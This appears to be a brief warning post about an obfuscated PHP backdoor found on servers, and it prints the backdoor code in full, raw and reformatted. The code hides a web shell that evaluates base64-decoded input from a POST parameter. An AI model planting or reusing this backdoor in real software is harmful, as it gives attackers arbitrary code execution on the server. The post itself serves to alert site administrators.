This code is tricky, very hard to find. The sF variable changing, as the sf array elements too.
The hackers can run almost every code on the server.
It’s a sneaky code, hard to clean, beware!
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n93bc3c'])) {eval($s21(${$s20}['n93bc3c']));}?>
The formatted code:
<? php $sF = "PCT4BA6ODSE_"; $s21 = strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]); $s20 = strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]); if (isset($ { $s20 }['n93bc3c'])) { eval($s21($ { $s20 }['n93bc3c'])); } ?>